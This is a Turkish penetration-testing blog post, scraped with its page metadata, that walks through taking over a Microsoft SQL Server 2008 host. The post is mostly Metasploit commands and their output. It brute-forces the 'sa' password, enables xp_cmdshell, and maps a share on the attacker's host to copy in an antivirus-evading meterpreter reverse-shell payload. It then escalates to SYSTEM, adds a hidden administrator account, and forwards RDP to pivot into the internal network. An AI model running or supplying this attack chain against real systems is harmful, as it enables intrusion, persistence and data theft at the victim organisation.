Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. Farkedilen en k\u00fc\u00e7\u00fck zaafiyet bile, \u00f6nemli bulgular elde etmeye yarayabilir. Bu yaz\u0131da da bir pantest \u00e7al\u0131\u015fmas\u0131yla kazan\u0131lan tecr\u00fcbeler anlat\u0131l\u0131yor.<\/p>\n
Bu arada, sistemleri internete a\u00e7\u0131k ve g\u00fcvenlik anlam\u0131nda politikalara sahip olmayan firmalardan, sald\u0131rganlar\u0131n ele ge\u00e7irdikleri \u015firket i\u00e7i \u00f6zel verilerini r\u00fc\u015fvet ve \u015fantaj amac\u0131 ile kulland\u0131klar\u0131 ile ilgili haberler s\u0131k s\u0131k bas\u0131nda yer almakta.<\/p>\n
Mssql Servisinin Belirlenmesi:<\/strong> Starting Nmap 5.21 ( http:\/\/nmap.org ) at 2012-01-29 21:53 EET<\/p>\n Nmap scan report for 9.1.1.1.dynamic.ttnet.com.tr (9.1.1.1) Mssql sunucularda en yetkili kullan\u0131c\u0131 “sa” kullan\u0131c\u0131s\u0131d\u0131r. Bu hesap ile, mssql server en y\u00fcksek yetkiler ile y\u00f6netilebilir.<\/p>\n “sa” hesab\u0131na y\u00f6nelik brute force denemesi<\/strong><\/p>\n Hedef sistemde, Mssql 2008 \u00e7al\u0131\u015fmakta ve “sa” kullan\u0131c\u0131 hesab\u0131 ile kimlik do\u011frulama yap\u0131labilmektedir.<\/p>\n Brute force ile parola deneme sald\u0131r\u0131s\u0131:<\/strong> msf > use auxiliary\/scanner\/mssql\/mssql_login<\/p>\n msf auxiliary(mssql_login) > set RHOSTS 9.1.1.1 msf auxiliary(mssql_login) > set USERPASS_FILE \/home\/ozanus\/pass.lst msf \u00a0auxiliary(mssql_login) > exploit<\/p>\n [*] 9.1.1.1:1433 MSSQL \u2013 [01\/13] \u2013 Trying username:\u2019sa\u2019 with password:\u201d Mssql’den bilgi toplama:<\/strong><\/p>\n Mssql sunucusundan veritaban\u0131 tablo yap\u0131s\u0131, konfigrasyon parametreleri, veritaban\u0131 kullan\u0131c\u0131lar\u0131, mssql’e login olmu\u015f kullan\u0131c\u0131 hesaplar\u0131 ve mssql sunucunun \u00e7al\u0131\u015ft\u0131\u011f\u0131 i\u015fletim sistemindeki kullan\u0131c\u0131 hesaplar\u0131 ve buna benzer bilgiler toplanabilir. [+] [2012.01.25-15:00:50] Workspace:hedeffirma Progress:1\/2 (50%) Probing 9.1.1.1 Mssql xp_cmdshell ve aktif edilmesi:<\/strong><\/p>\n xp_cmdshell, i\u015fletim sisteminde komut \u00e7al\u0131\u015ft\u0131rmak i\u00e7in kullan\u0131lan bir \u00f6zelliktir. Kontrol\u00fcn\u00fc ele ge\u00e7irdi\u011fimiz mssql server, Windows 2008 sunucu \u00fczerinde Administrator yetkileri ile \u00e7al\u0131\u015fmaktad\u0131r. Yetenekli ajan\u0131m\u0131z “meterpreter” payload’\u0131n\u0131 kar\u015f\u0131 tarafa y\u00fckleyip \u00e7al\u0131\u015ft\u0131rmay\u0131 ba\u015fard\u0131\u011f\u0131m\u0131z taktirde i\u015fletim sistemini ele ge\u00e7irebiliriz. Bu i\u015fletim sistemi \u00fczerinden firman\u0131n yerel a\u011f\u0131na ve dmz b\u00f6lgesindeki b\u00fct\u00fcn bilgisayarlara sald\u0131r\u0131 yapabiliriz.<\/p>\n Hedef sistemde komut \u00e7al\u0131\u015ft\u0131rmak i\u00e7in mssql xp_cmdshell \u00f6zelli\u011fini aktif ediyoruz. Bu i\u015flem i\u00e7in, mssql 2008 manager kullanarak hedef sisteme ba\u011flan\u0131p a\u015fa\u011f\u0131daki sorgular\u0131 \u00e7al\u0131\u015ft\u0131rmak yetiyor; Bu i\u015flem i\u00e7in metasploit “mssql_exec” yard\u0131mc\u0131 arac\u0131n\u0131 kullanabiliriz. Peki, hedef sistemde cmd.exe ile ne yapabiliriz ve cmd.exe ile uzak sistemden dosya \u00e7ekip nas\u0131l \u00e7al\u0131\u015ft\u0131rabiliriz?<\/p>\n Bunun i\u00e7in birden fazla “post explotion” tekni\u011fi mevcuttur. Hedef sistemde sahip oldu\u011fumuz kullan\u0131c\u0131 yetkileri, hedef i\u015fletim sisteminde kurulu yaz\u0131l\u0131mlar ve i\u015fletim sisteminin internet’e eri\u015fim kurabilece\u011fi portlara g\u00f6re farkl\u0131 teknikler geli\u015ftirilmi\u015ftir. Bu i\u015flem i\u00e7in pratik olarak kullan\u0131lak teknik ise, kendi windows sisteminizin payla\u015f\u0131m\u0131na ba\u011flan\u0131p buradan meterpreter ajan\u0131n\u0131 i\u015fletim sistemine kopyalamakt\u0131r. use auxiliary\/admin\/mssql\/mssql_exec output<\/p>\n \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014-<\/p>\n New connections will be remembered. [*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c copy o:\\80.exe C:\\80.exe\u2019<\/p>\n output 1 file(s) copied.<\/p>\n [*] Auxiliary module execution completed [*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c dir C:\\80.exe\u2019<\/p>\n output<\/p>\n \u2014\u2014<\/p>\n 0 Dir(s) 35,842,772,992 bytes free<\/p>\n 1 File(s) 112,399 bytes [*] Auxiliary module execution completed<\/code> Post Exploition Teknikleri<\/strong><\/p>\n Meterpreter ile eri\u015fim elde ettikden sonra yapacaklar\u0131n\u0131z\u0131n pek s\u0131n\u0131r\u0131 yok, yetkili bir kullan\u0131c\u0131 haklar\u0131na sahip de\u011filsek local privilege\u00a0escalation tekniklerini kullanarak yetki y\u00fckseltebiliriz. meterpreter > getuid Bu a\u015famadan sonra, sisteme admin haklar\u0131na sahip bir kullan\u0131c\u0131 ekleyip uzak masa\u00fcst\u00fc ile ba\u011flant\u0131 kurmak<\/p>\n Windows komut sat\u0131r\u0131na ge\u00e7i\u015f ve kullan\u0131c\u0131 hesab\u0131 eklemek.<\/strong> C:\\Windows\\system32>net user bga P!ssw0rd \/add <\/p>\n","protected":false},"excerpt":{"rendered":" Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. Farkedilen en k\u00fc\u00e7\u00fck zaafiyet bile, \u00f6nemli bulgular elde etmeye yarayabilir. Bu yaz\u0131da da bir pantest \u00e7al\u0131\u015fmas\u0131yla kazan\u0131lan tecr\u00fcbeler anlat\u0131l\u0131yor. Bu arada, sistemleri internete a\u00e7\u0131k ve g\u00fcvenlik anlam\u0131nda politikalara sahip olmayan firmalardan, sald\u0131rganlar\u0131n ele ge\u00e7irdikleri \u015firket i\u00e7i \u00f6zel verilerini […]<\/p>\n","protected":false},"author":1,"featured_media":2432,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[131,199],"tags":[223,224,225,226,227,228,229,230,231,232,233],"class_list":["post-754","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-guvenlik","category-siber-guvenlik","tag-brute-force-mssql","tag-microsoft-server","tag-microsoft-sql-server-2008","tag-msfconsole","tag-mssql","tag-mssql-guvenligi","tag-mssql-saldiri-yapmak","tag-mssql-server","tag-shell-atmak","tag-sql-komut-calistirma","tag-xp_cmdshell"],"yoast_head":"\n
\n# sudo nmap -sT -sV 9.1.1.1 -p 1433 -PN<\/code><\/p>\n
\nHost is up (0.027s latency).
\nPORT STATE SERVICE VERSION<\/strong>
\n1433\/tcp open ms-sql-s Microsoft SQL Server 2008<\/strong>
\nHedef sistemde Microsoft SQL Server 2008 servisi \u00e7al\u0131\u015fmakta.<\/p>\n
\n#msfconsole<\/code><\/p>\n
\nRHOSTS => 9.1.1.1<\/p>\n
\nUSERPASS_FILE => \/home\/ozanus\/pass.lst<\/p>\n
\n[-] 9.1.1.1:1433 MSSQL \u2013 [01\/13] \u2013 failed to login as \u2018sa\u2019
\n\u2026
\n\u2026
\n[+] 9.1.1.1:1433 \u2013 MSSQL \u2013 successful login \u2018sa\u2019 : \u2018benimgizliparolam\u2018,
\n[*] Scanned 1 of 1 hosts (100% complete)
\n[*] Auxiliary module execution completed
\nParola deneme sald\u0131r\u0131lar\u0131na kar\u015f\u0131 bir g\u00fcvenlik politikas\u0131 yoksa, brute force sald\u0131r\u0131s\u0131 ile ba\u015far\u0131l\u0131 sonu\u00e7 al\u0131nabilir, parola elde edilebilir.<\/p>\n
\nmsf > use auxiliary\/admin\/mssql\/mssql_enum
\nmsf auxiliary(mssql_enum) > set RHOST 9.1.1.1
\nRHOST => 9.1.1.1
\nmsf auxiliary(mssql_enum) > set PASSWORD benimgizliparolam
\nPASSWORD => benimgizliparolam
\nmsf auxiliary(mssql_enum) > exploit<\/code><\/p>\n
\n[*] [2012.01.25-15:00:50] Running MS SQL Server Enumeration\u2026
\n[*] [2012.01.25-15:00:50] Version:
\n[*] Microsoft SQL Server 2008 R2 (SP1) \u2013 10.50.2500.0 (X64)
\n[*] Jun 17 2011 00:54:03
\n[*] Copyright (c) Microsoft Corporation
\n[*] Standard Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)
\n[*] [2012.01.25-15:00:50] Configuration Parameters:
\n[*] [2012.01.25-15:00:50] C2 Audit Mode is Not Enabled
\n[*] [2012.01.25-15:00:50] xp_cmdshell is Enabled
\n[*] [2012.01.25-15:00:50] remote access is Enabled
\n[*] [2012.01.25-15:00:50] allow updates is Not Enabled
\n[*] [2012.01.25-15:00:50] Database Mail XPs is Not Enabled
\n[*] [2012.01.25-15:00:50] Ole Automation Procedures are Not Enabled
\n[*] [2012.01.25-15:00:50] Databases on the server:
\n[*] [2012.01.25-15:00:50] Database name:Bga1989
\n[*] [2012.01.25-15:00:50] Database Files for Bga1989:
\n[*] [2012.01.25-15:00:51] Z:\\SQL\\MSSQL\\Data\\Bga1989_Data.mdf
\n[*] [2012.01.25-15:00:51] Z:\\SQL\\MSSQL\\Data\\Bga1989_log.ldf
\n[*] [2012.01.25-15:00:51] Database name:XYZ_1989
\n[*] [2012.01.25-15:00:51] Database Files for XYZ_1989:
\n[*] [2012.01.25-15:00:51] Database name:XYZ_07
\n[*] [2012.01.25-15:00:51] Database Files for XYZ_07:
\n[*] [2012.01.25-15:00:51] Database name:XYZ_BGA
\n[*] [2012.01.25-15:00:51] Database Files for XYZ_BGA:
\n[*] [2012.01.25-15:00:51] Z:\\XYZ_DB\\abcVERILER\\XYZ_BGA\\XYZ_BGA.mdf
\n[*] [2012.01.25-15:00:51] Z:\\XYZ_DB\\abcVERILER\\XYZ_BGA\\XYZ_BGA.ldf
\n[*] [2012.01.25-15:00:55] System Logins on this Server:
\n[*] [2012.01.25-15:00:56] sa
\n[*] [2012.01.25-15:00:56] ##MS_SQLResourceSigningCertificate##
\n[*] [2012.01.25-15:00:56] ##MS_SQLReplicationSigningCertificate##
\n[*] [2012.01.25-15:00:56] ##MS_SQLAuthenticatorCertificate##
\n[*] [2012.01.25-15:00:56] ##MS_PolicySigningCertificate##
\n[*] [2012.01.25-15:00:56] ##MS_SmoExtendedSigningCertificate##
\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##
\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM
\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER
\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator
\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT
\n[*] [2012.01.25-15:00:56]
\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##
\n[*] [2012.01.25-15:00:56] ##MS_AgentSigningCertificate##
\n[*] [2012.01.25-15:00:56] Disabled Accounts:
\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##
\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##
\n[*] [2012.01.25-15:00:56] No Accounts Policy is set for:
\n[*] [2012.01.25-15:00:56] sa
\n[*] [2012.01.25-15:00:56] Password Expiration is not checked for:
\n[*] [2012.01.25-15:00:56] sa
\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##
\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##
\n[*] [2012.01.25-15:00:56] System Admin Logins on this Server:
\n[*] [2012.01.25-15:00:56] sa
\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM
\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER
\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator
\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT
\n[*] [2012.01.25-15:00:56] Windows Logins on this Server:
\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM
\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator
\n[*] [2012.01.25-15:00:56] Windows Groups that can logins on this Server:
\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER
\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT
\n[*] [2012.01.25-15:00:56] Accounts with Username and Password being the same:
\n[*] [2012.01.25-15:00:56] No Account with its password being the same as its username was found.
\n[*] [2012.01.25-15:00:56] Accounts with empty password:
\n[*] [2012.01.25-15:00:56] No Accounts with empty passwords where found.
\n[*] [2012.01.25-15:01:02] Stored Procedures with Public Execute Permission found:
\n[*] [2012.01.25-15:01:02] sp_replsetsyncstatus
\n[*] [2012.01.25-15:01:02] sp_replcounters
\n[*] [2012.01.25-15:01:02] sp_replsendtoqueue
\n[*] [2012.01.25-15:01:02] sp_resyncexecutesql
\n[*] [2012.01.25-15:01:02] sp_prepexecrpc
\n[*] [2012.01.25-15:01:02] sp_repltrans
\n[*] [2012.01.25-15:01:02] sp_xml_preparedocument
\n[*] [2012.01.25-15:01:02] xp_qv
\n[*] [2012.01.25-15:01:02] xp_getnetname
\n[*] [2012.01.25-15:01:02] sp_releaseschemalock
\n[*] [2012.01.25-15:01:02] sp_refreshview
\n[*] [2012.01.25-15:01:02] sp_replcmds
\n[*] [2012.01.25-15:01:02] sp_unprepare
\n[*] [2012.01.25-15:01:02] sp_resyncprepare
\n[*] [2012.01.25-15:01:02] sp_createorphan
\n[*] [2012.01.25-15:01:02] xp_dirtree
\n[*] [2012.01.25-15:01:02] sp_replwritetovarbin
\n[*] [2012.01.25-15:01:02] sp_replsetoriginator
\n[*] [2012.01.25-15:01:02] sp_xml_removedocument
\n[*] [2012.01.25-15:01:02] sp_repldone
\n[*] [2012.01.25-15:01:02] sp_reset_connection
\n[*] [2012.01.25-15:01:02] xp_fileexist
\n[*] [2012.01.25-15:01:02] xp_fixeddrives
\n[*] [2012.01.25-15:01:02] sp_getschemalock
\n[*] [2012.01.25-15:01:02] sp_prepexec
\n[*] [2012.01.25-15:01:02] xp_revokelogin
\n[*] [2012.01.25-15:01:02] sp_resyncuniquetable
\n[*] [2012.01.25-15:01:02] sp_replflush
\n[*] [2012.01.25-15:01:02] sp_resyncexecute
\n[*] [2012.01.25-15:01:02] xp_grantlogin
\n[*] [2012.01.25-15:01:02] sp_droporphans
\n[*] [2012.01.25-15:01:02] xp_regread
\n[*] [2012.01.25-15:01:02] sp_getbindtoken
\n[*] [2012.01.25-15:01:02] sp_replincrementlsn
\n[*] [2012.01.25-15:01:02] Instances found on this server:
\n[*] [2012.01.25-15:01:02] MSSQLSERVER
\n[*] [2012.01.25-15:01:03] Default Server Instance SQL Server Service is running under the privilege of:
\n[*] [2012.01.25-15:01:03] HEDEFFIRMA\\administrator
\n[+] [2012.01.25-15:01:03] Workspace:hedeffirma Progress:2\/2 (100%) Complete (0 sessions opened) auxiliary\/admin\/mssql\/mssql_enum<\/p>\n
\nEXEC sp_configure \u2018show advanced options\u2019, 1
\nGO
\nRECONFIGURE
\nGO
\nEXEC sp_configure \u2018xp_cmdshell\u2019, 1
\nGO
\nRECONFIGURE
\nGO<\/code>
\nxp_cmdshell ile komut \u00e7al\u0131\u015ft\u0131rmak:<\/strong><\/p>\n
\n# msfconsole<\/code><\/p>\n
\nmsf \u00a0auxiliary(mssql_exec) >\u00a0set CMD \u2018cmd.exe \/c net use o: \/USER:Administrator \\\\88.1.1.188\\c$ parola\u2019
\nCMD => cmd.exe \/c net use o: \/USER:Administrator \\\\88.1.1.188\\c$ parola
\nmsf \u00a0auxiliary(mssql_exec) >\u00a0exploit
\nE\u011fer komut \u00e7al\u0131\u015ft\u0131ysa, diski map edebilmi\u015f miyiz kontrol edelim:
\nmsf auxiliary(mssql_exec) >\u00a0set CMD \u2018cmd.exe \/c net use\u2019
\nCMD => cmd.exe \/c net use
\nmsf auxiliary(mssql_exec) > exploit
\n[*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c net use\u2019<\/code><\/p>\n
\nOK O: \\\\88.1.1.188\\c$ Microsoft Windows Network<\/strong>
\nStatus Local Remote Network
\nThe command completed successfully.
\nUnavailable R: \\\\1.1.0.198\\dosyasunucu Microsoft Windows Network
\nUnavailable Z: \\\\1.1.0.202\\d$ Microsoft Windows Network
\nEvet, diski O:\\ s\u00fcr\u00fcc\u00fc ad\u0131 olarak hedef sisteme map ettik. \u015eimdi buradaki casus yaz\u0131l\u0131m\u0131 sisteme kopyalay\u0131p \u00e7al\u0131\u015ft\u0131ral\u0131m. Bu \u00e7al\u0131\u015fmada, hedef sistemde Endpoint Security yaz\u0131l\u0131m\u0131 \u00e7al\u0131\u015fmaktad\u0131r. Meterpeter antivir\u00fcs ve content filter sistemlere kar\u015f\u0131 encode edilerek tamamen tan\u0131nma hale getirilmi\u015ftir.
\nmsf auxiliary(mssql_exec) > set CMD \u2018cmd.exe \/c copy o:\\80.exe C:\\80.exe\u2019
\nCMD => cmd.exe \/c copy o:\\80.exe C:\\80.exe
\nmsf auxiliary(mssql_exec) > exploit<\/p>\n
\n\u2014\u2014<\/p>\n
\nListeleyelim, 80.exe ismi ile dosyam\u0131z hedef sistemde mi ?
\nmsf auxiliary(mssql_exec) > set CMD \u2018cmd.exe \/c dir C:\\80.exe\u2019
\nmsf auxiliary(mssql_exec) > exploit<\/code><\/p>\n
\nDirectory of C:\\
\nVolume Serial Number is
\nVolume in drive C has no label.
\n25.01.2012 20:21 112,399 80.exe<\/p>\n
\nEvet, dosyam\u0131z hedef sunucuya kopyalanm\u0131\u015f. 80.exe \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131m\u0131zda \u00a0meterpreter reverse connection kurarak sistemi emrimize sunacakt\u0131r.<\/p>\n
\nmeterpreter > getsystem
\n\u2026got system (via technique 1)<\/code><\/p>\n
\nServer username: NT AUTHORITY\\SYSTEM
\n1. teknikde ba\u015far\u0131l\u0131 oldu ve art\u0131k SYSTEM yetkiler ile hedef sistemde \u00e7al\u0131\u015fabiliriz.<\/p>\n
\nmeterpreter > shell
\nProcess 6364 created.
\nChannel 1 created.
\nMicrosoft Windows [Version 6.0.6002]
\nCopyright (c) 2006 Microsoft Corporation. All rights reserved.<\/code><\/p>\n
\nnet user bga P!ssw0rd \/add
\nThe command completed successfully.
\nC:\\Windows\\system32>net localgroup Administrators bga \/add
\nnet localgroup Administrators bga \/add
\nThe command completed successfully.
\nPort forwarding ile uzak masa\u00fcst\u00fc eri\u015fimi kurmak<\/strong>
\nMeterpreter\u2019in portfwd \u00f6zelli\u011fi ile, kendi sisteminizdeki bir portu kurban sisteme bind edebilirsiniz.A\u015fa\u011f\u0131daki \u00f6rnekde, sald\u0131r\u0131 yapan 88.1.1.188 ip adresinin \u00a03389 portuna gelen istekler, hedef sistemin 3389 portuna y\u00f6nlendirilmi\u015ftir.
\nmeterpreter > portfwd add -l 3389 -p 3389 -r 1.1.1.111
\n[*] Local TCP relay created: 0.0.0.0:3389 <-> 1.1.1.111:3389<\/code>
\nBa\u011flant\u0131 i\u00e7in,
\n#\u00a0rdesktop 88.1.1.188 -k tr -u bga<\/code>
\nUzak sistemin bulundu\u011fu network\u2019deki di\u011fer ip adreslerine eri\u015fmek i\u00e7in meterpreter\u2019in route \u00f6zelli\u011fi kullan\u0131labilir. Metasploit hedef sistemi kullanarak di\u011fer sunuculara eri\u015fim kurabilir.
\nmeterpreter >\u00a0route add 1.1.1.0 255.255.255.0 3<\/code>
\nBu a\u015famadan sonra, metasploit auxiliary ve exploit\u2019lerini uzak sisteme uygulayabilirsiniz.<\/p>\n